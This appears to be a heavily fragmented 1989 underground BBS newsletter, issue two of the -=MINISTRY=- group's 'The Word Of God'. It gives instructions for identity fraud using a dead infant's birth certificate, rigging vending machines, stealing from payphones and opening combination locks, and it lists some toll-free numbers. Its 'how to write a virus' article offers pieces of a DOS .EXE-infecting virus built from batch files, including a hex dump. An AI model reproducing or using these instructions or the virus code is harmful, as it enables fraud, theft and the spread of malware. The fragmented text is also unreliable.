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################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##   T h e  W o r d  O f  G o d    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   A -=MINISTRY=- Production    ##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Hotel Chelsea  -  Rocky Horror  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Fungus Land    -  Malignant     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                     Growth     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Ulterior Motives - Rafe Zetter  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+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+.+##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##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########|/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## Issue |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## Number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## ------  TWO  (2)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##     NOVEMBER 1989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 everybody.  We actually made it to a second newsletter!!  Well,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congratulated us on our first newsletter and it wasn't e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!   Well, this one will definitely be better folks.  trust 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e are accepting people into MINISTRY now.  Call one  of  the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above  (all  /Wasea/  and available on your local pirate bo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ut an application, or ask  the  sysop.   We  will  ask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 check  with  everyone  else in the group, and then give yo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We will also be inviting special people in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||-| OW TO CHANGE YOUR IDENTITY FOR GOOD (AND NOT GET CAU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you want to change your identity huh?  You "forgot" to pay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?  You "accidentally" went into a bank with a gun and too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  Well, here's some good ways of disguising yourself  as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 and  not  get  found  by  people,  relatives, friend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MOVE to a different  city  and  state.   Preferably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you  know  NO  ONE!!!  You could accidentally meet a fri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here lots of people lived and all  it  takes  is  one  fri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 REMOVE  or  DISGUISE any special characteristics that pu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crowd.  Blend i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go to the Social Security or Dept.  of  Records.   Search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 until  you  find  a baby that died VERY soon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n.  Then pay the $10 or  so  for  the  BIRTH  certifica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.   With  that  birth  certificate,  you are elig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r's registration card.  With these two  pieces  of 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get  a  social  security  card.   With those 3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's liscense.  You are home fre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, if you have any HOBBIES, try to keep them PRIVAT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aught because they were on page 24 of 'The Fishing  Home  Jou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,  Unlisted numbers.  This won't keep a persistent person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but it will keep away unwanted individuals without the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hould  pretty  much keep you from being caught.  Again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s how much you should REMAIN QUIET AND KEEP A LOW PROFIL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governo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Hain / Rocky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-=MINISTRY=-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 some ideas.  School has started and you have noth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  Now, it gets boring after a while, but school is only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s you make it to be.  Here are some ways to have fun and get R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n  older  or  used  pop  machine,  then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beat it until it does.  You need to find any butt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 that  will push in and move to one of the sides and stay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it (an un-noticable amount.)  Then stand back.  People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in and push their favorite pop button, but nothing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utton you have stuck.  If the button you moved  was  ou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light was on,) then it will not give them anything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get their money back.  When they go to tell som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thing  is  your  chance  to go fix the button, coin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galo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l back the rubber cover that goes  from  the  wire  to  the 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ted  right belkow the mouthpiece.)  Take your wirecutters and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d wire.  Peel it away so it does not touch  itself.   fix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eave.   Next  day,  come  back  and  touoch  the  wir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many people  used  (or  tried  to  use)  the  pa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neds  on  how  much money you get back!  Do it before a big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r a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gt;This is originally taken from PHRACK #1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MASTER Combin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ck MASTER locks (and I am wondering if lockers work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..) you must go through THREE (3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  1&gt;  Pull  on the horseshoe shaped "handle."  Hard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ob moves roughly, but still moves.  Then turn  the  knob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til it won't move anymore.  Add -5- to this number.  Congr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firs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 2&gt; Spin the dial to the left a few times until you get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Then turn right until you come to the 1st number again.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handle  and turn.  If it stops, then try to see if i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r just clicking.  If it is locked there, then you  have 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  3&gt;  Spin  a  few to clear and go right to the first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nce and then to the 2nd number.   then  go  opposit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ing up once at each number.  Eventually it will pop open!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so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Fun Numbers to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Link                      |(800)/325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Bank                       |(800)/223-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                            |(800)/526-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otors                 |(800)/685-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                          |(800)/828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                           |(800)/521-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, Tobacco, and Firearms |(800)/523-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                       |(800)/225-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Originally Printed in P/HUN ]I[ - Toll Center BBS (718)358-9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write a VIRUS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written by Sam Hain for -=Ministry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us will only attack .EXE files.  After the execu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.INH file which contains the directory, and the file %S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start with '%' are NOT infected and pose as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us is written in 3 .BATch files.one does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while hte other two help to write the virus itself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system MUST have DEBUG and EDLIN on the dis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V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        }turns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nul         }turns console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      }may be different on the system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com/w&gt;ind  }the Dir is written on "ind"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 ind&lt;1      }"IND" is processed with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&lt;2          }new batch prgm is create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 name.bat&lt;3 }this batch goes EXE because of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n         } console interface once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}newly created NAME.B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4d   }lines 1-4 of IND file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}saves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0,10b,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8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0,10b,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"DEL "     }This does all the debu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000,f00b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c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10 0d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010,f020,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12 "COPY \V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2b od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THIS FILE MUST BE PRINTED AS A HEX DUMB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TROL CHARACTERS AND THIS IS NOT ENTIRELY PRINTAB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   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 7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,  1  ?        .  .  N  Y  Y  Y  Y  Y  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0   79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 7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.  2  ,  ?  ?  R     .  .  N  N  Y  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0   79 79 79 79 29 0D 45 0D-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Y  Y  Y    .  E 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virus to work, VR.BAT should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Possibly have it move itself ther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bout it for this issue.  Next month, be looking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=Ministry=- Annoyance Dialer.  Very good for people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very happy with.  Also!  -=Ministry=- BBS program is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.  NOT another FORUM-PC clone either.  Hotel Chelsea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until I can find a GOOD bbs program to run.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tworking built in, but not necessary.  Please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LTERIOR MOTVIES (who is also down due to a viru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ing witht he FAT table) or FUNGUS LAND.  Get the number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boards.  BY THE WAY - I downloaded from a boar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a program that had billions and billions of pirate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ncluded (when we pirated.)  I can't believe anyone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st ONE person got ahold of it who didn't believe in it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ts...  It's like, PHRY CODE PLUS.  All these do-gooder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ere uploading it on the support system.  Not cool guy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ome people to give me some good stuff for December. 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989) Ministr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vision of -=MINISTRY=- Infiltration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